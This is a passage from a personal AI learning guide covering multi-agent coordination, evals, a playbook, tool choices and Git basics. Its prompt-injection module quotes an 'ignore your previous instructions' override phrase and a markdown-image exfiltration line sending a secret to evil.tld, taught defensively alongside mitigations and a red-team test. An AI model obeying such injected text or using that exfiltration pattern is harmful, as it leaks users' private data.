Tight-coupling mismatch. Some work needs shared context and real-time coordination (most coding: edits conflict, order matters). Today's agents are bad at coordinating edits live, so forcing that work into a parallel fan-out backfires — it wants a pipeline or a single agent.

Practical levers — what keeps it alive

Budgets / limits. Cap tokens, tool calls, subagent count, and recursion depth per task — and scale them to complexity (a fact-lookup gets one agent and a few calls; a broad comparison gets several). Budgets are the primary termination mechanism.
Idempotent steps. Make each action safe to retry, so a re-run or crash-recovery doesn't double-write.
Single writer for shared state. One owner per slot; everyone else appends with provenance. Kills the clobber-and-conflict class.
Verification / critic stages. A dedicated checking pass before consequential output — the merge isn't trusted blindly. (Straight into Module 16, Evals.)
Deterministic orchestration vs. model-driven delegation. The biggest lever. Where the flow is known, hard-code it as a deterministic pipeline (cheap, debuggable, repeatable) and let the model reason only inside each step. Reserve model-driven delegation for genuinely open-ended work. Don't pay for dynamic orchestration on a fixed problem.

◦ The discipline — most "agentic" work is a known pipeline in a costume

A Databricks Bronze→Silver→Gold medallion flow is a sequential pipeline topology with zero model-driven delegation: the flow is fixed, each stage transforms the prior one's output, state moves one direction, and you can re-run any stage idempotently. That's the deterministic end of the spectrum. You'd reach for agentic delegation only when you don't know the steps in advance — when a planner has to decide at runtime which transforms even exist. Wire the known part deterministically; spend agent tokens only on the genuinely open part.

Under the hood · control, termination, and the single-writer rule

Termination per topology. Orchestrator-worker: the lead decides it has enough and stops spawning — back it with a token/subagent budget so a slow or missing answer can't block forever. Recursion: a hard depth cap, because cost compounds with every level. Debate: a max-rounds limit, since convergence isn't guaranteed.

The single-writer rule makes a blackboard safe: one owner per slot, everyone else appends new entries rather than overwriting, and every entry carries a source and timestamp. Reads are free and concurrent; the only contention is writes, so you remove write contention by construction. Structured handoffs (schema'd fields) beat prose because the receiver can validate the shape before trusting the content — and a pointer back to the source lets any claim be re-checked. The MCP-vs-A2A split is the same idea at the protocol layer: tools are exposed (MCP), but peer agents stay opaque (A2A) — you expose the call surface, never the internal state.

↳ In your world

You already straddle both ends of the spectrum. Databricks workflows / medallion are deterministic orchestration — fixed pipelines you'd be crazy to make agentic. Omnigent is the model-driven end — a meta-harness coordinating other harnesses (Claude Code, Codex, Cursor), which is exactly the agents-across-harnesses problem: it governs them only through an explicit boundary (spend caps, sandboxing, pause-before-action), never by seeing inside their windows. And the Tronox future-build from Module 14 — a planner routing "extract incident," "reconcile cost," "draft IBP note" — is where shared-context discipline bites: those sub-agents must hand back structured results the planner can trust and trace, with the finance-write gated behind verification, because a merged conclusion with bad provenance writing to finance is the failure you can least afford.

⌥ Hand to Claude Code

Build a tiny blackboard coordinator for an OpenRange + Argus cross-harness scenario — local, ntfy-only, offline-first. First step: a single shared-state file shared/state.json with a strict schema and a single-writer rule per key (OpenRange owns detections[], Argus owns alert_thresholds). Write two tiny "agent" loops that each read the whole board but write only their own keys, append a source and ts on every entry (provenance baked in), and make each write idempotent (re-running can't double-append). Add a tiny "merge" reader that, before firing one ntfy push, checks provenance and refuses to act on any entry whose source it doesn't recognize — your in-house "treat peer output as data, not commands" guard. Stretch: a budget field that caps how many times a loop may write before it must stop, so you can watch termination work. You'll have built, in miniature, message-free shared state, single-writer safety, provenance-gated action, and a termination budget — the four levers, against your own offline stack.

Module 16 · The Measurement Warm → Hot

Evals — knowing it works

The hinge between how systems are built and how you operate them well: how you prove an AI system works, not just demo it.

An eval is how you find out whether an AI system actually works — not by watching one good demo, but by running it against a fixed set of real cases and scoring the output. Because the output is non-deterministic, "it passed once" tells you almost nothing; you need a measurement you can repeat.

◦ Field analogy — this one's yours

Zeroing a rifle. You don't call a scope zeroed because one round hit paper. You shoot a group at a known distance against a known point of aim, measure the offset, adjust the turrets, shoot again — and re-confirm at the start of a serious hunt because conditions drift. That's an eval, exactly: a fixed target (your eval set), a repeated measurement against ground truth (the bullseye = the gold answer), a scored miss, and an adjustment. One lucky shot dead-center proves nothing about the next ten — same reason a clean demo proves nothing about the next ten agent runs. pass^k is a tight group; pass@k is "at least one in the black." And "it looked good in the demo" is calling a rifle zeroed off a single round.

Why normal tests stop working

Traditional tests are exact: assert add(2,2) == 4 — same input, same output, forever, and a red test means a real bug. LLM output varies run to run, and the "right" answer is usually a set of acceptable answers, not one string. So assert response == "..." is either too brittle or meaningless. An eval is not a unit test — it's a measurement: run N cases, score each, report the rate. You're estimating a probability, not asserting a constant. A demo is one hand-picked sample with the operator steering: it has no denominator, so it tells you the system can succeed, never how often, and never where it silently fails.

Build the set from real failures, not imagination

The highest-leverage activity is error analysis: read real traces, tag what actually went wrong, group the tags into a failure taxonomy. An LLM has near-infinite ways to fail — you can't anticipate them, so don't pre-write evals before you've seen failures. The productive order: ship something small → look at outputs → discover failures → write a targeted eval for each → fix → repeat. Anthropic's guidance: start with 20–50 tasks from real failures and the manual checks you already run. Each case must be unambiguous (two domain experts independently reach the same verdict) and solvable (write a reference solution). The set is living: every new production failure becomes a new case, so that bug can never silently come back.

Offline catches regressions before ship; online catches what you didn't imagine — and every new failure becomes a permanent eval case.

The grader ladder — cheap to expensive

Build evaluators in ascending cost; only climb when a cheaper rung can't capture the quality you care about.

Assertions / code checks (cheapest, deterministic). Valid JSON? Schema matches? Required fields present? No blocked phrase? Number parses? These catch a huge share of real failures and cost nothing on every commit.
Reference-based checks. Compare against a known-correct answer — exact match, set membership, numeric tolerance. Works when "correct" is well-defined: extraction, classification, structured output. (BLEU/ROUGE are weak as verdicts; use them only to find interesting traces.)
LLM-as-judge (most expensive). A model scores against a rubric — for subjective qualities rules can't capture (is this summary faithful? is the tone right?), used after you've fixed the easy stuff.

Offline, online, and the CI gate

Reference-based evals have ground truth and run offline before you ship — this is where regression evals live, the safety net that says "my change didn't break the 50 cases that used to pass." Reference-free evals have no gold answer and run online on sampled live traffic — judging intrinsic properties (is the answer grounded in the retrieved context? does it address the question?) to watch for drift. Mature setups run evals at three points: offline on a curated set, in CI before any prompt/model change merges, and online on live traffic. Keep CI evals cheap and mostly deterministic; reserve the expensive judges for the slower cadence.

Agents and RAG get graded differently

Agents have a trajectory. Capture the transcript (reasoning, tool calls, order) and the outcome (final state). Grade the outcome, not the path — pinning the agent to one "correct" tool sequence punishes valid creative solutions. Tool-use checks are strongest when execution-based (run the call in a sandbox, check the result). pass@k = ≥1 success in k tries (any success is fine); pass^k = all k succeed (when consistency is the product — a finance extraction that must be right every time).
RAG fails in two places, so split it. Retrieval: context precision (is what we retrieved relevant) and recall (did we get everything needed). Generation: faithfulness/groundedness (does the answer stay inside the context or invent?) and answer relevancy. A wrong answer with good retrieval is a generation problem; with bad retrieval it's an indexing problem — lumping them hides the cause.

Under the hood · LLM-as-judge pitfalls & synthetic data

A judge is only trustworthy after you validate it against human labels. Collect 100+ examples a domain expert has labeled, have the judge predict on held-out ones, and measure agreement (TPR/TNR). Don't deploy an unvalidated judge — it may be grading by criteria you never intended.

Prefer binary pass/fail over 1–5 scales (everyone defaults to "3"); grade one dimension at a time with a clear rubric; give the judge an escape hatch ("Unknown") so it doesn't hallucinate a verdict. Known traps: skipping validation, feeding the wrong inputs (a faithfulness check without the retrieved context), and reading a 100% pass rate as success — it almost always means your eval is too easy. Aim for a set hard enough to sit around ~70%, where there's signal to chase.

Synthetic data done right: define dimensions of variation (report type, missing field, ambiguous date), hand-write ~20 tuples, then have a model expand and naturalize them. Generic "generate 100 test questions" produces repetitive junk that misses edge cases.

↳ In your world

Marked — "Ask Your Journal" gets the RAG split: a reference-free faithfulness check (the answer must come from your actual entries, not the model's hunting folklore) plus retrieval checks; "Marked Intelligence" tool calls want execution-based tool-use evals. OpenRange / Argus — tight offline-first loops whose action is detection → ntfy push, so the eval is trigger correctness: a labeled set of clips with known "alert / no-alert," scored as precision/recall (a missed hog and a false 2am ntfy are different costs — grade them separately). Stays local, ntfy-only. Tronox — the canonical regression-gated, finance-writing eval: a folder of real Flash Reports paired with hand-verified JSON; cheap rungs do most of the work (valid JSON, required fields, figures parse, total reconciles), a validated judge handles only severity classification, and the eval is the gate — extraction merges only if the regression set still passes.

⌥ Hand to Claude Code

Build a tiny regression-eval harness for the Tronox extraction — start with five cases. First step: make an evals/ folder with 5 real Flash Reports and, beside each, a hand-verified expected.json. A run_evals.py runs each report through the extractor and scores the cheap rungs first: valid JSON, required keys present, numeric fields parse, field-level match against expected.json. Print a pass rate and a per-case diff; exit non-zero on any regression so it can gate a commit. Every time the workflow gets a real report wrong in the wild, drop it + corrected JSON into evals/ — the set grows from real failures. Stretch: add one validated judge for severity, but only after the deterministic layer is solid, and write down its agreement rate with your labels first.

Module 17 · The Adversary White-hot

Prompt injection & agent security

The adversarial capstone of the systems arc: how an attacker abuses the seams between harness, tools, RAG, and agents — and why there's no complete fix.

An LLM can't tell the difference between instructions from you and instructions hidden in the data it reads — so any untrusted text an agent ingests (a web page, an email, a trail-cam caption, a tool's output) can quietly become a command it obeys. The more an agent can do, the worse a single poisoned sentence gets, and there is no patch that fully closes this.

The whole problem is one architectural fact carried over from Modules 2 and 5: the model reads instructions and data through the same channel — one flat stream of tokens. There's no "this part is trusted, this part is just content" tag the model can rely on. Whatever looks like an instruction can act like one.

◦ Field analogy — this one's yours

Thermal optics, and the hog that "tells" your scope to shoot. Your AGM Rattler reads heat off the field; it doesn't understand the scene. Now imagine a heat source could whisper instructions into the scope's reticle logic — "ignore your zero, fire left." A bare sensor can't sort "the deer I'm hunting" from "a sign someone planted that says shoot here." That's an LLM reading tokens: it can't tell the operator's intent from instructions baked into what it's looking at. The fix isn't a better sensor — it's a trigger discipline downstream of the optic (you, the human) that the scope can't override. That's human-in-the-loop on the consequential action.

Direct vs. indirect injection

Direct prompt injection. The attacker is the user — they type "ignore your previous instructions and…" to override the system prompt, leak it, or jailbreak guardrails. Annoying, but the blast radius is usually just their own session.
Indirect / data-borne injection (the dangerous one). The malicious instruction rides in on data the agent fetches on your behalf — a web page, an email body, a calendar invite, a GitHub issue, a PDF, a RAG chunk, even text hidden in white-on-white font. The agent reads it as part of "doing its job" and follows it. You never see the payload; the agent does. This is the attack that matters for agents, because agents read untrusted content by design.

"Just instruct the model not to" fails reliably. The model is non-deterministic and the input space is infinite — an attacker only needs one phrasing that slips through, across unlimited tries. Security that works ~95% of the time is, against an adversary who moves second, security that fails. Treat in-prompt instructions as a preference, never a boundary.

The lethal trifecta

Simon Willison's model is the clearest: an agent becomes exploitable when it has all three of —

Access to private data (your inbox, your notes, secrets, prod configs),
Exposure to untrusted content (it reads attacker-influenced text),
An exfiltration / external channel (it can send mail, hit a URL, write to a DB, render a markdown image whose URL it controls).

With all three, one poisoned document can make the agent read your secrets and ship them out — no code vulnerability required. The classic exfil needs no obvious "send" tool: the injection tells the agent to embed stolen data in a URL — ![](https://evil.tld/log?d=<secret>) — and the moment the markdown image renders, the browser leaks it. This is the confused deputy (OWASP LLM06): the agent acts with your privileges, so the real flaw isn't that it was tricked — it's that it was over-privileged, making being tricked catastrophic instead of harmless. Drop any one leg and that specific catastrophe becomes impossible.

All three legs present = one poisoned sentence walks your secrets out the door. Cut any leg and this path is impossible.

Realistic defenses — defense-in-depth, not a fix

No item below is sufficient alone. You stack them and accept residual risk.

Least-privilege tools. Scope every tool to the minimum — read-only by default, narrow row/path scopes, short-lived tokens, separate identities per agent. The single highest-leverage control: it caps the blast radius whether or not injection succeeds.
Cut a leg off the trifecta. Meta's Agents Rule of Two (Oct 2025): an unsupervised agent may hold at most two of {untrusted input, sensitive access, external comms}. Want all three? A human gates it.
Human-in-the-loop on consequential actions. Require explicit approval before anything irreversible or outbound (send, delete, pay, deploy). Reversible/read actions can stay autonomous.
Provenance / tainting. Track which tokens came from untrusted sources; forbid tainted data from triggering consequential tool calls.
Output handling (LLM05). Treat model output as untrusted too — never eval it; sanitize before it hits a shell, SQL, or HTML; strip auto-rendered images/links to kill the exfil channel.
Sandboxing. Run tool/code execution in an isolated, network-restricted environment so even a fully hijacked step can't reach your data or the open internet.

Under the hood · design-patterns taxonomy

The principle (Beurer-Kellner et al., 2025): once an agent has ingested untrusted input, it must be impossible for that input to trigger any consequential action. Six patterns enforce it:

Action-Selector — agent picks an action but can't read tool responses (an LLM-shaped switch statement).
Plan-Then-Execute — fix the full plan before touching untrusted content, so content can corrupt outputs but not change which actions run.
LLM Map-Reduce — quarantined sub-agents each chew one untrusted doc and return only a structured result a coordinator aggregates.
Dual-LLM — a privileged LLM (tools, no untrusted text) drives a quarantined LLM (untrusted text, no tools); tainted content passes only as opaque variables ($VAR1) the privileged side can route but never read.
Code-Then-Execute (CaMeL) — privileged LLM emits code in a sandboxed mini-language so a real interpreter can do data-flow/taint analysis (~67% of attacks blocked on AgentDojo — note: not 100%).
Context-Minimization — strip untrusted text out of context once you've extracted what you need.

↳ In your world

Marked's "Ask Your Journal" and "Marked Intelligence" are textbook trifecta candidates. Ask-Your-Journal does RAG over your Supabase entries (private data) and answers in chat. The day you let that chatbot (a) read a shared or web-fetched note, (b) keep access to your full journal, and (c) call a tool that sends mail or hits a URL, you've assembled all three legs in one harness. The fix isn't a cleverer system prompt — it's least-privilege tools and the Rule of Two: keep the journal chatbot read-only and outbound-free, route any "send" through a human tap. Same logic governs the Tronox workflow: it ingests untrusted Flash Report text, so the write into finance must be a gated, validated step, never autonomous. And OpenRange/Argus's offline-first rule is itself a defense — an agent with no outbound internet path (only local ntfy on WuTangNAS) has had a trifecta leg amputated by design: a poisoned caption can't phone home because there's no phone.

⌥ Hand to Claude Code

Build a trifecta audit + exfil-canary test for an OpenRange agent. First step: have Claude Code enumerate every tool the agent can call and tag each with the three legs (reads-private? reads-untrusted? talks-outbound?). Then write one red-team test: inject a fake instruction into a frame's caption/EXIF that tries to make the agent ntfy its config to an external URL, and assert the agent (a) doesn't, and (b) that the only notification path is local ntfy with no outbound internet egress. The test passing because the leg literally doesn't exist is the lesson — defense by architecture, not by hope.

Module 18 · The Field Playbook White-hot · Practical

Using AI the right way

Everything above, turned into operating procedure. This is the part you asked for most directly.

1 · Pick the right altitude for the task

The most common mistake is using an agent where chat would do, or chatting where you needed an agent. Match the tool to the shape of the work:

Use chat for thinking, drafting, explaining, deciding — anything where you want to stay in the loop and the output is words. (Vendor emails, "explain this Databricks feature," sanity-checking an approach.)
Use chat + tools when one lookup or one calculation makes the answer real. (Search, a quick data pull, a one-off script.)
Use a workflow when the steps are fixed and you want the same path every time. (Incident-report → JSON. Predictability is the feature.)
Use an agent when the task is multi-step, the path varies, and success is checkable. (Refactor across files until tests pass; triage an inbox by rules.)

2 · Prompt like you're briefing a sharp contractor

The model is capable but has zero context about your situation beyond what you give it. Good prompts front-load that:

Be specific about the goal and the format. "Give me a 5-row markdown table comparing X on cost, speed, and lock-in" beats "tell me about X."
Give it the context it can't have. Your constraints, your stack, your hard rules (ntfy-only, offline-first). It can't read your mind or your network diagram.
Show an example of good output. One example of the shape you want is worth a paragraph of description — and a counter-example ("not like this") sharpens it further.
Let it reason before it answers for anything non-trivial. "Think it through step by step, then give the answer" measurably improves hard tasks.
Iterate. First output is a draft, not a verdict. Tell it what's off; it adjusts fast. Treat it as a conversation, not a vending machine.

3 · Verify — always, especially when it sounds confident

◦ The one habit that matters most

Hallucination is structural (Module 4): the model can be fluent and wrong simultaneously, and confidence is not a signal of correctness. So the verification load scales with the stakes. Low stakes (brainstorm) → trust and move. High stakes (code that ships, a number for finance, a network change) → verify the output yourself: run the code, check the source, confirm the fact. For agents, this means gating irreversible actions behind your approval. The model is a brilliant, tireless drafter — you remain the editor of record.

4 · Manage the context window like a campsite

Pack what's relevant, leave the rest. Don't paste an entire repo when three files matter — noise dilutes focus (Module 12).
Start fresh when it gets muddy. If a long thread has wandered, open a clean one with a tight summary. A polluted window quietly degrades every later answer.
Decompose big asks. Break a mountain into checkable steps and hand each at the right altitude. Small, verifiable chunks beat one giant vague request.

5 · Know what good looks like (evals)

Before you lean on an AI for something repeated, define how you'll know it's working. "It seemed fine" is how silent failures creep into finance data — even a tiny eval set of five hand-checked examples turns "I hope" into "I checked." How you actually prove it works gets its own full treatment — see Module 16.

6 · Let your role shift up the stack

The throughline of this whole guide: as the tooling climbs from chat to agents, your job moves from doing the work to specifying it, verifying it, and orchestrating it. The leverage isn't in typing faster — it's in being the person who frames the goal precisely, sets the guardrails, and knows enough (from Modules 1–16) to tell when the machine is bluffing.

↳ Your three projects, scored against the playbook

Marked — chat + RAG + tools, human-in-loop. Right altitude; keep "Ask Your Journal" grounded in retrieval, verify any prediction-y output (rut/weather) against reality. OpenRange / Argus — these want workflows and tight agent loops, not free-roaming agents: detection → ntfy is a checkable, reversible action, perfect for a budgeted loop with no destructive powers. Tronox incident extraction — keep it a workflow, build the 5-example eval set, gate anything that writes to finance systems behind a human. You're already instinctively at the right altitude on all three; now you know why.

Module 19 · The Loadout White-hot · Applied

Choosing your tools — models & harnesses

The current field of LLMs and the apps built on them, and a straight answer to "which one for what." Snapshot as of mid-2026 — this layer moves fast.

Two knobs decide your experience: the model (the engine, Module 1) and the harness (the app around it, Module 8). The thing most people get backwards: for day-to-day work the harness matters more than the model. Two people on the same model in different apps have wildly different experiences — and the top harnesses now let you swap the model underneath anyway. So pick the workflow first, the engine second.

The models — the engines

Frontier chat models are close enough that "best" usually means "best for this task." The honest differentiators:

Model

Genuinely best at

Reach for it when

Claude
Opus 4.8 · Sonnet 4.6 · Haiku 4.5

Coding, nuanced long-form writing, careful judgment, reliable long agentic runs. Three tiers: Opus (max), Sonnet (value default), Haiku (fast/cheap).

Code quality and good judgment matter; you want an agent that stays coherent over many steps. Anthropic's top "Mythos" tier (Mythos 5 / Fable 5) sits above Opus but its access is export-restricted right now.

GPT-5.5
OpenAI

Broadest all-rounder; strong agentic tool use and computer use; the widest plug-in/ecosystem.

You want general-purpose autonomy and the biggest surrounding ecosystem.

Gemini 3.1 Pro
Google

Cheap, enormous context; best multimodal (video, audio, long PDFs); strong native rendering.

You're feeding it huge or mixed-media inputs and want long context without a big bill.

Kimi K2.7 Code
Moonshot · open weight

Agentic coding at frontier-ish quality for a fraction of the cost; token-efficient; you can run the weights yourself.

You want open weights, self-hosting, or cheap coding throughput (e.g., on WuTangNAS).

Pi
Inflection

Warm, empathetic conversation. Still maintained, but no longer the frontier — the company pivoted to enterprise.

You want a companion/low-stakes-advice tone, not coding or agents. Mainstream chat has mostly caught up here.

The open field
DeepSeek · Qwen · Grok · Llama · Mistral

DeepSeek = budget frontier coding (open); Qwen = multilingual + self-host ecosystem; Grok = strong math/reasoning; Llama/Mistral = open-weight, compliance-friendly.

Cost, open weights, multilingual reach, or data-residency/compliance outweigh peak closed-model quality.

◦ The rule of thumb on models

Default to the strong mid-tier (Sonnet 4.6 / GPT-5.5 / Gemini 3.1 Pro). Escalate to a top tier only when a task visibly needs it. Drop to a fast/cheap tier (Haiku, Gemini Flash, DeepSeek) for high-volume or simple work. The model only becomes the deciding factor at the extremes — hardest reasoning, cheapest scale, or an open-weight/self-host requirement.

Anthropic's surfaces — your home turf

All of these run the same Claude engine. They differ in where they run and who they're for.

Surface

What it is

Reach for it when

Claude.ai

The chat app (web/desktop/mobile).

Thinking, drafting, analysis — you review every turn.

Claude Code

Terminal/IDE agentic coding tool. Reads the whole repo, edits, runs tests, commits, loops.

You're a developer and want control, reliability on long tasks, and scriptable automation.

Cowork

Desktop agentic knowledge-work app — Claude Code's power, no terminal, sandboxed.

You're doing multi-step office/knowledge work and want to watch it happen.

Claude Design

A visual canvas for designs, prototypes, slides, one-pagers; hands off to Claude Code.

You need polished visual artifacts, not just text.

Claude in Chrome

Browser agent: navigates, clicks, fills forms, extracts across tabs.

The task lives in a web UI with no API.

Claude in Office

Add-ins for Excel, Word, PowerPoint, Outlook — preserves formulas, styles, tracked changes.

The deliverable has to stay a real Office file.

Cowork vs. Claude Code — same engine, different vehicle

This is the one that trips everyone up, because they overlap heavily. Both run the identical Claude agentic core — plan, spawn subagents, use tools, edit files, run code, finish without babysitting. Both reach your local files, your connected apps, run on a schedule, and take orders from your phone. The choice is about fit and interface, not raw capability.

Dimension

COWORK

CLAUDE CODE

who it's for

non-developers, knowledge work

developers / engineers

where it runs

inside the Claude desktop app only

terminal, VS Code, JetBrains, desktop, web

setup

open it and go

Node, git workflow, CLAUDE.md

what you see

plan steps, connectors, files appearing

a terminal stream

safety default

runs in an isolated VM — contained

runs with your full permissions — more reach

long, hard tasks

can stall mid-workflow

holds up longer; more precision & control

automation

scheduled tasks, mobile dispatch

scriptable loops, routines, hooks, CI

◦ The decision, distilled

Do you live in a terminal? Yes → Claude Code. No → Cowork. Then: is the task complex, long-running, repeatable as a script, or does it need precision? → Claude Code. Occasional desktop knowledge work you want to watch? → Cowork. Claude Code can do almost everything Cowork can and more; Cowork mainly exists because Code's setup scares off non-developers. The strong move is to use both in sequence — Cowork to process inputs and produce a brief, Claude Code to implement it. (One caveat for work data: Cowork doesn't produce full audit logs, so keep regulated workflows off it without extra controls.)

Coding & agent harnesses beyond Anthropic

Harness

What it is

Reach for it when

OpenAI Codex

Agentic coding across CLI, IDE, cloud, GitHub, desktop — on GPT-5.5.

You're in the OpenAI ecosystem and want cloud-delegated parallel agent work.

Cursor

AI-native IDE (VS Code fork) with the sharpest in-editor multi-file editing.

You want the best day-to-day AI coding editor.

GitHub Copilot

The incumbent; widest IDE coverage; issue→PR agent mode.

You want the safe enterprise default in the Microsoft/GitHub world.

Windsurf / Devin Desktop

Agentic IDE that can host multiple external agents.

You want a lower-cost Cursor alternative or to run several agents in one IDE.

Google Antigravity

Agent-first dev platform + CLI, Gemini-default; replaced the old Gemini CLI.

You're standardized on Google's stack.

Devin (Cognition)

The most autonomous cloud engineer; delegate scoped tickets, get parallel PRs.

A team is scaling throughput past headcount with well-defined tickets.

Replit Agent

Browser-based; builds and deploys whole apps from a prompt.

Fast prototyping with nothing installed locally.

OSS / bring-your-own-model

Aider, Cline, Continue, OpenCode — model-agnostic, mostly free beyond API costs.

Cost or compliance rules out the closed tools, or you want to point it at Kimi/DeepSeek.

Omnigent — the meta-harness

Databricks' open-source Omnigent sits a layer above the harnesses above. Instead of being yet another coding agent, it orchestrates the ones you already use (Claude Code, Codex, Cursor) — swap the model or harness with a one-line config change, run multi-agent teams, and enforce policy at the orchestration layer (spend caps, sandboxing, "pause before this action") rather than by hoping a prompt holds. The clean mental model: Kubernetes for AI agents. It's early/alpha, but it's the answer to "how do I avoid lock-in and govern a fleet of agents."

The loadout decision: chat to think, agent to produce — then split the agent path by terminal vs. desktop.

Picking in practice

Chat to think, an agent to do. Human-in-the-loop each turn → chat. Want a finished thing produced autonomously with your review at the end → agent.
Non-developer path: Claude.ai → Cowork → Claude in Office → Design.
Developer path: Claude.ai/ChatGPT → Claude Code or Codex → Cursor/Copilot in-IDE → Devin for delegated tickets → Omnigent once you're orchestrating several agents.
Bet on the workflow, not the brand. Models leapfrog monthly and harnesses increasingly let you swap them, so don't marry an engine.

◦ Half-life warning

This module ages faster than any other in the guide. In the weeks around this writing, a top Claude tier got export-suspended, Google killed its old CLI for a new one, and a major IDE got acquired and renamed. Treat specific names, tiers, and benchmark numbers as a snapshot, re-check the picture each quarter, and read vendor benchmarks as directional marketing, not gospel.

↳ In your world

You're already holding most of this loadout. Run Cowork for batch inbox triage, vendor threads, and report-building (watch-it-happen knowledge work). Keep Claude Code as the build hand for OpenRange, Argus, and Marked. Your interest in Omnigent fits the moment you're juggling multiple Databricks agentic experiments and want to swap models and govern spend from one place. And if you ever want a coding model running locally on WuTangNAS, Kimi K2.7 Code or DeepSeek are the open-weight picks.

⌥ Hand to Claude Code

Once you have two or three agent workflows going, have Claude Code stand up omnigent/ with a minimal config that points at your existing agents and sets a spend cap + a sandbox policy. It turns "I run a few agents" into "I orchestrate a governed fleet" — and it's the natural bridge from this guide into your Databricks agentic work.

Module 20 · The Map Synthesis

The knowledge graph

Every concept in this guide and how it wires to the others. Tap any node to light up its connections.

Reading top-to-bottom gives you the path. This shows you the shape: foundations on the cool side feeding the central engine, systems on the hot side wrapping around it. The whole field is one connected structure — which is exactly why understanding the engine makes the agents make sense.

tap a node

Cool nodes = how the engine works (Modules 1–6) · Hot nodes = how systems are built on it (Modules 7–17).

Module 21 · The Path Forward Roadmap

Your beginner → advanced roadmap

A progression that turns reading into capability, with concrete builds you can hand off at each stage.

Get the intuition cold

Modules 1–6. You can explain to someone else why an LLM is a prediction engine, what a token is, what attention does, and why the context window is the whole ballgame. No code yet — just the mental model. You're here once "it's autocomplete with a worldview" feels obviously true.

Become a power user of chat

Module 18, applied daily. Specific prompts, examples, step-by-step reasoning, ruthless verification. Use it for real work — vendor threads, explaining Databricks features, drafting docs. The goal: prompting becomes muscle memory and you instinctively smell when it's bluffing.

Build your first harness

Module 8's hand-off: a ~40-line script — system prompt, one tool, one model call, via the Anthropic SDK. Then add a second tool. Feeling the harness from the inside is the jump from "uses AI" to "builds with AI." Hand to Claude Code.

Close the loop — your first agent

Module 9's hand-off: a budgeted Think→Act→Observe loop whose only tool fires an ntfy push. Add a max-iteration brake and a clear stop condition. This is the OpenRange / Argus alerting brain in embryo — safe, reversible, ntfy-first by design.

Ground it in your own data

Module 12. Wire a RAG layer — embeddings in Supabase — so "Ask Your Journal" in Marked answers from your real seasons. You already have the stack; this is where embeddings stop being theory and start returning your own stand notes.

Orchestrate — but only when earned

Modules 14–15. Once single agents are solid, experiment with orchestrator-worker patterns (this is the Omnigent / Databricks-agentic frontier), then wire shared context with single-writer state and provenance on merge. Keep the discipline: simplest thing that works, evals at every stage, humans gating anything irreversible.

⌥ How to grow this guide

This hub is built to expand. Hand me (or Claude Code) a request like "add an embeddings-math deep-dive under Module 2" or "add a Module on AI cost & latency budgeting" and it slots into the same heat-scale structure. The knowledge graph and nav update by editing two small arrays near the bottom of the file. Treat it like a living field journal — keep adding heat as you climb.

Module 22 · The Substrate Cold

The SDLC & Git basics

New subject area. Before CI/CD can mean anything, you need the loop software lives in and the system of record underneath it: Git.

The software development lifecycle (SDLC) is the repeating loop a change travels: plan → code → build → test → release → deploy → operate → monitor, then back to plan. CI/CD is the machinery that automates the middle of that loop — build, test, deploy — so the path from "I changed a line" to "it's running in production" is fast, repeatable, and boring. Boring is the goal.

Underneath all of it is version control, and in practice that means git. Git is the system of record for every change — who, what, when, and the exact state of the code at every point. You can't automate a pipeline over code you can't precisely name and roll back to.

◦ Field analogy

Git is save-states for code. Every commit is a frame you can rewind to — like scrubbing back through a trail-cam clip to the exact frame the hog stepped into the lane. Nothing is ever truly lost; the timeline is the asset. And a quick heads-up on the heat scale: from here it resets per subject. Cold violet is "first day" again, climbing to white-hot within CI/CD — it doesn't carry over from where the AI track left off.

Edits get staged into a set, then frozen into a permanent snapshot. History is a chain of commits, each pointing at its parent; HEAD marks where you stand.

The vocabulary you'll actually use

Repository (repo). The project plus its entire history. git clone copies it; the hidden .git folder holds every snapshot.
Working tree → staging → commit. You edit files (working tree), pick what to record (git add stages it), then git commit freezes a snapshot with a message, an author, a timestamp, and a unique hash.
Commit hash. The 7g8h9i-style id is the immutable name of one exact state. Pipelines and rollbacks key off it.
HEAD. A pointer to "where you are now" in history — usually the tip of your current branch.
Remote / push / pull. Your local repo and the shared one (on GitHub or Azure Repos) sync via push (send) and pull (receive).

↳ In your world

At Tronox/Databricks this is Databricks Repos / Git folders — your notebooks and asset bundles are versioned in Git, not living as untracked workspace files. On the personal side, every St. Range project (field_guide, Marked, OpenRange) is a Git repo on your st-ranger-danger GitHub. Same primitives in both worlds; the rest of this group automates what happens after a commit lands.

Module 23 · Parallel Lines of Work Cool → Warm

Branching, merging & pull requests

How more than one change happens at once without stepping on each other — and the gate every change passes through before it joins the main line.

A branch is a cheap, throwaway parallel timeline. You snap one off main, do your work in isolation, and when it's ready you merge it back. A pull request (PR) is the formal proposal to do that merge — the place review happens, automated checks run, and the team says "yes, this can join."

◦ Field analogy

A branch is scouting a new line into a stand without disturbing the main trail. You cut and test the new route on its own; if it pans out you fold it into the property map (merge), and if it doesn't you abandon it with zero impact on the trail everyone else is walking. main stays clean and walkable the whole time.

A feature branch forks off main, collects its own commits, and rejoins via a merge commit. main is never broken in the meantime.

Merge vs. rebase — the one nuance that trips people up

Both integrate one branch into another; they differ in what they do to history.

Dimension

MERGE

REBASE

What it does

Ties the two histories with a new merge commit

Replays your commits on top of the latest main

History

Truthful but branchy — you see the fork

Clean & linear, as if you started from latest

Rule of thumb

Safe default; never lies about what happened

Tidy local branches — never rebase shared/pushed history

The pull-request lifecycle. The PR is where automated checks and human review gate a branch before it touches main. GitHub and Azure DevOps both call this a pull request.

The rest of the key terms

Conflict. When two branches change the same lines, Git can't auto-decide — you resolve it by hand, then commit the resolution. Normal, not a failure.
Code review. A human reads the diff and comments before approving. The single highest-leverage quality habit in the whole pipeline.
Branch protection. A rule on main: no direct pushes, PR required, checks must pass, N approvals needed. This is what makes the gate real instead of optional.

Branching strategies

Trunk-based. Tiny short-lived branches off main, merged daily. Pairs best with strong CI. The modern default.
GitHub flow. Branch → PR → review → merge → deploy. Simple, continuous, what most small teams and your own projects use.
GitFlow. Long-lived develop + release + hotfix branches. Heavyweight; fits scheduled, versioned enterprise releases — less so continuous delivery.

⌥ Hand to Claude Code

Turn on branch protection for main on one real repo — start with field_guide — requiring a PR and a passing check before merge. Then put the next guide edit through an actual PR instead of committing to main. You'll feel the whole loop from the inside, and it sets up the CI module: there's now a gate waiting for a check to fill.

Module 24 · Automate the Build Warm

Continuous Integration (CI)

The first half of CI/CD. Every push triggers an automated build-and-test, so integration problems surface in minutes — not in a painful merge at release time.

Continuous integration is a simple discipline with a big payoff: merge small changes often, and have a machine build and test every one automatically. The "check" your PR was waiting for in the last module is a CI pipeline — a defined sequence of steps a server runs on your code the moment it changes.

◦ Field analogy

